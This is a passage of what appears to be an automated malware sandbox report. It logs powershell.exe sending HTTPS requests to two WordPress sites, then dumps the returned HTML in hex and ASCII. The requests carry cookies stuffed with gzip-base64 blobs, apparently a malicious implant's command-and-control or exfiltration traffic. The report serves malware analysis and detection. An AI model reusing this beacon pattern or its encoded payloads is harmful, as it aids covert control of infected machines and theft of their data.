61 74 65 4d 6f 64 69 66 69 65 64 22 3a 22 32 30 32 34 2d 31 32
                                                    Data Ascii: \u0648\u0645\u0624\u0644\u0651\u0641\u0627\u062a \u0633\u0645\u0627\u062d\u0629 \u0627\u0644\u0634\u0651\u064a\u062e \u062d\u0628\u064a\u0628 \u0627\u0644\u0643\u0627\u0638\u0645\u064a.","datePublished":"2022-02-06T01:40:01+03:00","dateModified":"2024-12
                                                    2024-12-18 10:19:49 UTC1369INData Raw: 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 37 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d
                                                    Data Ascii: ges\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/alseraj.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,tim
                                                    2024-12-18 10:19:49 UTC1369INData Raw: 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c 79 3a 21 30 7d 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 28 61 2c 65 2c 6e 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67
                                                    Data Ascii: llReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSetting
                                                    2024-12-18 10:19:49 UTC1369INData Raw: 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26
                                                    Data Ascii: n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.11.2049728194.163.167.354438988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:19:58 UTC2249OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQbChI/fknpusOUQ2y/9/xsK2c7RzxnigJR/Lgxzs5ZrfVSr69mzmD02gUIc9Y4y3UYFqyoNcwZts0ojoWEMKC65/k2opZBC795E6Uc1F8OCm/5d4df9CvSVCX7LRgXpifhjA9AhGmUXdNEitCoLge371PFwtr7VfEhxOqE9uHs3RUCdaD1nJVRD5Yrjj3 [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: saeedmdcat.com
                                                    Connection: Close
                                                    2024-12-18 10:19:58 UTC420INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:19:58 GMT
                                                    Server: Apache/2.4.62 (Unix) OpenSSL/1.0.2k-fips
                                                    Vary: Cookie,User-Agent,Accept-Encoding
                                                    Accept-Ranges: bytes
                                                    Content-Length: 65713
                                                    Cache-Control: max-age=3600, public
                                                    Expires: Wed, 18 Dec 2024 10:19:58 GMT
                                                    Referrer-Policy: no-referrer-when-downgrade
                                                    X-Powered-By: WP Rocket/3.8.7
                                                    Pragma: public
                                                    Connection: close
                                                    Content-Type: text/html; charset=UTF-8
                                                    2024-12-18 10:19:58 UTC7772INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 7a 65 73 3d 22 61 75 74 6f 22 20 69 5d 2c
                                                    Data Ascii: <!doctype html><html lang="en-US" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><style>img:is([sizes="auto" i],
                                                    2024-12-18 10:19:58 UTC8000INData Raw: 61 6c 54 72 61 63 6b 65 72 2e 74 72 61 63 6b 65 72 73 5b 68 6f 6f 6b 4e 61 6d 65 5d 28 70 61 72 61 6d 65 74 65 72 73 29 3b 0a 09 09 09 09 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 09 09 09 09 5f 5f 67 74 61 67 44 61 74 61 4c 61 79 65 72 28 27 65 76 65 6e 74 27 2c 20 6e 61 6d 65 2c 20 70 61 72 61 6d 65 74 65 72 73 29 3b 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 09 09 09 5f 5f 67 74 61 67 44 61 74 61 4c 61 79 65 72 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 20 61 72 67 75 6d 65 6e 74 73 29 3b 0a 09 09 09 09 09 09 7d 0a 09 09 09 09 09 7d 0a 0a 09 09 09 09 09 5f 5f 67 74 61 67 54 72 61 63 6b 65 72 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 09 09 09 09 09 5f 5f 67 74 61 67 54
                                                    Data Ascii: alTracker.trackers[hookName](parameters);} else {__gtagDataLayer('event', name, parameters);}} else {__gtagDataLayer.apply(null, arguments);}}__gtagTracker('js', new Date());__gtagT
                                                    2024-12-18 10:19:58 UTC8000INData Raw: 65 6e 74 2d 73 69 7a 65 3a 20 38 30 30 70 78 3b 2d 2d 77 70 2d 2d 73 74 79 6c 65 2d 2d 67 6c 6f 62 61 6c 2d 2d 77 69 64 65 2d 73 69 7a 65 3a 20 31 32 30 30 70 78 3b 20 7d 3a 77 68 65 72 65 28 62 6f 64 79 29 20 7b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 7d 2e 77 70 2d 73 69 74 65 2d 62 6c 6f 63 6b 73 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 20 7b 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 32 65 6d 3b 20 7d 2e 77 70 2d 73 69 74 65 2d 62 6c 6f 63 6b 73 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 20 7b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 65 6d 3b 20 7d 2e 77 70 2d 73 69 74 65 2d 62 6c 6f 63 6b 73 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 20 7b 20 6a 75 73 74 69 66 79 2d 63
                                                    Data Ascii: ent-size: 800px;--wp--style--global--wide-size: 1200px; }:where(body) { margin: 0; }.wp-site-blocks > .alignleft { float: left; margin-right: 2em; }.wp-site-blocks > .alignright { float: right; margin-left: 2em; }.wp-site-blocks > .aligncenter { justify-c
                                                    2024-12-18 10:19:58 UTC8000INData Raw: 68 65 6c 6c 6f 2d 65 6c 65 6d 65 6e 74 6f 72 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 32 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 68 65 6c 6c 6f 2d 65 6c 65 6d 65 6e 74 6f 72 2d 74 68 65 6d 65 2d 73 74 79 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 61 65 65 64 6d 64 63 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 68 65 6c 6c 6f 2d 65 6c 65 6d 65 6e 74 6f 72 2f 74 68 65 6d 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 32 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 68 65 6c 6c 6f 2d 65 6c 65
                                                    Data Ascii: hello-elementor/style.min.css?ver=3.2.1' media='all' /><link rel='stylesheet' id='hello-elementor-theme-style-css' href='https://saeedmdcat.com/wp-content/themes/hello-elementor/theme.min.css?ver=3.2.1' media='all' /><link rel='stylesheet' id='hello-ele
                                                    2024-12-18 10:19:59 UTC8000INData Raw: 39 20 65 6c 65 6d 65 6e 74 6f 72 2d 70 61 67 65 20 65 6c 65 6d 65 6e 74 6f 72 2d 70 61 67 65 2d 31 30 36 30 22 3e 0a 0a 0a 3c 61 20 63 6c 61 73 73 3d 22 73 6b 69 70 2d 6c 69 6e 6b 20 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 22 20 68 72 65 66 3d 22 23 63 6f 6e 74 65 6e 74 22 3e 53 6b 69 70 20 74 6f 20 63 6f 6e 74 65 6e 74 3c 2f 61 3e 0a 0a 3c 68 65 61 64 65 72 20 69 64 3d 22 73 69 74 65 2d 68 65 61 64 65 72 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 68 65 61 64 65 72 20 64 79 6e 61 6d 69 63 2d 68 65 61 64 65 72 20 6d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 2d 6d 6f 62 69 6c 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 2d 69 6e 6e 65 72 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 62 72 61 6e 64 69 6e 67
                                                    Data Ascii: 9 elementor-page elementor-page-1060"><a class="skip-link screen-reader-text" href="#content">Skip to content</a><header id="site-header" class="site-header dynamic-header menu-dropdown-mobile"><div class="header-inner"><div class="site-branding
                                                    2024-12-18 10:19:59 UTC8000INData Raw: 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 31 32 35 32 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 61 65 65 64 6d 64 63 61 74 2e 63 6f 6d 2f 6b 69 70 73 2d 73 75 70 65 72 2d 66 69 6e 61 6c 2d 73 65 73 73 69 6f 6e 32 30 32 30 2f 22 3e 4b 49 50 53 20 53 55 50 45 52 20 46 49 4e 41 4c 20 53 45 53 53 49 4f 4e 28 32 30 32 30 29 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 75 73 74 6f 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 63 75 73 74 6f 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 31 34 30 38 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70
                                                    Data Ascii: m-type-post_type menu-item-object-page menu-item-1252"><a href="https://saeedmdcat.com/kips-super-final-session2020/">KIPS SUPER FINAL SESSION(2020)</a></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1408"><a href="http
                                                    2024-12-18 10:19:59 UTC8000INData Raw: 6d 67 20 64 65 63 6f 64 69 6e 67 3d 22 61 73 79 6e 63 22 20 77 69 64 74 68 3d 22 33 30 30 22 20 68 65 69 67 68 74 3d 22 33 30 30 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 61 65 65 64 6d 64 63 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 31 32 2f 53 54 45 50 2d 32 30 32 31 2d 33 30 30 78 33 30 30 2e 6a 70 65 67 22 20 63 6c 61 73 73 3d 22 61 74 74 61 63 68 6d 65 6e 74 2d 6d 65 64 69 75 6d 20 73 69 7a 65 2d 6d 65 64 69 75 6d 20 77 70 2d 69 6d 61 67 65 2d 31 33 35 37 22 20 61 6c 74 3d 22 22 20 73 72 63 73 65 74 3d 22 68 74 74 70 73 3a 2f 2f 73 61 65 65 64 6d 64 63 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 31 32 2f 53 54 45 50 2d 32 30 32 31 2d 33 30 30 78
                                                    Data Ascii: mg decoding="async" width="300" height="300" src="https://saeedmdcat.com/wp-content/uploads/2021/12/STEP-2021-300x300.jpeg" class="attachment-medium size-medium wp-image-1357" alt="" srcset="https://saeedmdcat.com/wp-content/uploads/2021/12/STEP-2021-300x
                                                    2024-12-18 10:19:59 UTC8000INData Raw: 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 74 72 69 67 67 65 72 45 76 65 6e 74 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 2c 74 2e 75 73 65 72 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 2c 74 2e 6f 70 74 69 6f 6e 73 29 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 74 72 69 67 67 65 72 45 76 65 6e 74 73 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 2c 74 2e 75 73 65 72 45 76 65 6e 74 4c 69 73 74 65 6e 65 72
                                                    Data Ascii: tion(t){this.triggerEvents.forEach(function(e){return window.addEventListener(e,t.userEventListener,t.options)})}},{key:"_removeEventListener",value:function(t){this.triggerEvents.forEach(function(e){return window.removeEventListener(e,t.userEventListener
                                                    2024-12-18 10:19:59 UTC1941INData Raw: 3a 7b 22 70 61 67 65 22 3a 5b 5d 2c 22 65 64 69 74 6f 72 50 72 65 66 65 72 65 6e 63 65 73 22 3a 5b 5d 7d 2c 22 6b 69 74 22 3a 7b 22 61 63 74 69 76 65 5f 62 72 65 61 6b 70 6f 69 6e 74 73 22 3a 5b 22 76 69 65 77 70 6f 72 74 5f 6d 6f 62 69 6c 65 22 2c 22 76 69 65 77 70 6f 72 74 5f 74 61 62 6c 65 74 22 5d 2c 22 67 6c 6f 62 61 6c 5f 69 6d 61 67 65 5f 6c 69 67 68 74 62 6f 78 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 63 6f 75 6e 74 65 72 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 66 75 6c 6c 73 63 72 65 65 6e 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 7a 6f 6f 6d 22 3a 22 79 65 73 22 2c 22 6c 69 67 68 74 62 6f 78 5f 65 6e 61 62 6c 65 5f 73 68 61 72 65 22 3a 22 79 65
                                                    Data Ascii: :{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"ye


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.11.2049729104.21.10.2244431972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:20:10 UTC2246OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQbChI/fknpusOUQ2y/9/xsK2c7RzxnigJR/Lgxzs5ZrfVSr69mzmD02gUIc9Y4y3UYFqyoNcwZts0ojoWEMKC65/k2opZBC795E6Uc1F8OCm/5d4df9CvSVCX7LRgXpifhjA9AhGmUXdNEitCoLge371PFwtr7VfEhxOqE9uHs3RUCdaD1nJVRD5Yrjj3 [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: alseraj.net
                                                    Connection: Close
                                                    2024-12-18 10:20:11 UTC832INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:20:11 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Last-Modified: Wed, 18 Dec 2024 09:38:26 GMT
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=isQJBhligqLJTVgTAgLZjGs1zG68ghUfjElo8RTgBI6DBy%2FNoiBJcEPWGuJOl0B0EtqSV47OI9bYgEmSSXoAo3HKzhbRtxPbmLkXe4b7EcEIuYzymd52CGJVmJiM1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f3e6b369bc2bfae-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=141451&min_rtt=141327&rtt_var=29945&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2865&delivery_rate=27020&cwnd=249&unsent_bytes=0&cid=3615558da34e0333&ts=873&x=0"
                                                    2024-12-18 10:20:11 UTC537INData Raw: 37 64 33 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 72 74 6c 22 20 6c 61 6e 67 3d 22 61 72 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 7a 65
                                                    Data Ascii: 7d3c<!DOCTYPE html><html dir="rtl" lang="ar" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"> <style>img:is([size
                                                    2024-12-18 10:20:11 UTC1369INData Raw: 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 b4 d8 a8 d9 83 d8 a9 20 d8 a7 d9 84 d8 b3 d8 b1 d8 a7 d8 ac 20 d9 81 d9 8a 20 d8 a7 d9 84 d8 b7 d8 b1 d9 8a d9 82 20 d8 a7 d9 84 d9 89 20 d8 a7 d9 84 d9 84 d9 87 d8 9b 20 d9 85 d9 88 d9 82 d8 b9 20 d8 ab d9 82 d8 a7 d9 81 d9 8a d8 8c 20 d8 a5 d8 b9 d9 84 d8 a7 d9 85 d9 8a 20 d9 88 d8 aa d8 a8 d9 84 d9 8a d8 ba d9 8a d8 8c 20 d9 8a d9 87 d8 af d9 81 20 d9 84 d9 86 d8 b4 d8 b1 20 d9 85 d8 b9 d8 a7 d8 b1 d9 81 20 d8 a7 d9 84 d8 a5 d8 b3 d9 84 d8 a7 d9 85 20 d8 a7 d9 84 d9 85 d8 ad d9 85 d9 91 d8 af d9 8a 20 d9 88 d8 aa d8 b1 d9 88 d9 8a d8 ac 20 d8 a7 d9 84 d8 ab d9 91 d9 82 d8 a7 d9 81 d8 a9 20 d8 a7 d9 84 d8 af d9 91 d9 8a d9 86 d9 8a d9 91 d8 a9
                                                    Data Ascii: ><meta name="description" content="
                                                    2024-12-18 10:20:11 UTC1369INData Raw: d8 a7 d8 ac 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 70 64 61 74 65 64 5f 74 69 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 32 30 32 34 2d 31 32 2d 31 38 54 31 30 3a 32 36 3a 32 37 2b 30 33 3a 30 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 61 6c 73 65 72 61 6a 2e 6a 70 67 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 73 65 63 75 72 65 5f 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74
                                                    Data Ascii: " /><meta property="og:updated_time" content="2024-12-18T10:26:27+03:00" /><meta property="og:image" content="https://alseraj.net/wp-content/uploads/2023/01/alseraj.jpg" /><meta property="og:image:secure_url" content="https://alseraj.net/wp-content
